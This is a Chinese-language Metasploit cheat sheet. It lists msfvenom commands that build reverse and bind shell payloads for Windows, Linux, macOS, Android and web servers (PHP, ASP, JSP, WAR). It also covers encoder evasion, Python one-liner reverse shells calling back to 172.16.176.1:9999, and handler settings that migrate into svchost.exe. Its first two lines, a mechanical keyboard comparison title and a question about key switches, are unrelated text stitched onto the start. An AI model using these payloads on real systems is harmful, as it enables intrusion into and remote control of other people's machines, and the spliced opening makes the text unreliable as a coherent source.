8种机械键盘轴体对比
本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?
查看payloads: msfvenom --list payloads
查看支持的文件格式:msfvenom --help-formats
查看payload所需参数:msfvenom -p xxx --payload-options
编码参数-e x86/shikata_ga_nai -i 5 -b "x00" //使用shikata_ga_nai编码器编码5次并去除空字符
常用payloadwindows/shell_bind_tcp
windows/meterpreter/bind_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
linux/x86/shell_bind_tcp
linux/x86/meterpreter_reverse_tcp
System Payloads
linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f elf > shell.elf
windows
messagebox Testmsfvenom -a x86 -p windows/messagebox TEXT="hello, it is a test"
windows下生成32位/64位payload时需要注意。msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f exe > shell.exe
以windows/meterpreter/reverse_tcp为例,该payload默认为32位,也可使用-a x86选项指定。
如果要生成64位,则payload为windows/x64/meterpreter/reverse_tcp。
Netcat
nc正向连接msfvenom -p windows/shell_hidden_bind_tcp rhost=192.168.0.107 lport=8956 -f exe> 1.exe
nc反向连接,监听msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=888 -f exe> 1.exe
Macmsfvenom -p osx/x86/shell_reverse_tcp LHOST=xxx LPORT=xxx -f macho > shell.macho
Androidmsfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.apk
Web Payloads
phpmsfvenom -p php/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php
aspmsfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f asp > shell.asp
jspmsfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.jsp
warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f war > shell.war
pythonmsfvenom -p cmd/unix/reverse_python LHOST=xxx LPORT=xxx -f raw > shell.py
msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.py
正向shellpython/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.176.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
python/python3 -c "exec("import socket, subprocess;s = socket.socket();s.connect(('172.16.176.1',9999))nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())")"
bashmsfvenom -p cmd/unix/reverse_bash LHOST=xxx LPORT=xxx -f raw > shell.sh
perlmsfvenom -p cmd/unix/reverse_perl LHOST=xxx LPORT=xxx -f raw > shell.pl
MSF监听use exploit/multi/handler
set PAYLOAD
set RHOST
set RPORT
set LHOST
set LPORT
set ExitOnSession false
exploit -j -z
其他设置
AutoRunScript:自动执行脚本
如:自动执行post/windows/manage/migrate 模块注入其他进程set AutoRunScript post/windows/manage/migrate
自动注入进程set prependmigrate true
set prependmigrateProc svchost.exe
辅助配置set exitonsession false //可以让建立监听的端口继续保持侦听,可以接受多个session
set stagerverifysslcert false //防止获取shell的时候出现的SSL_accept错误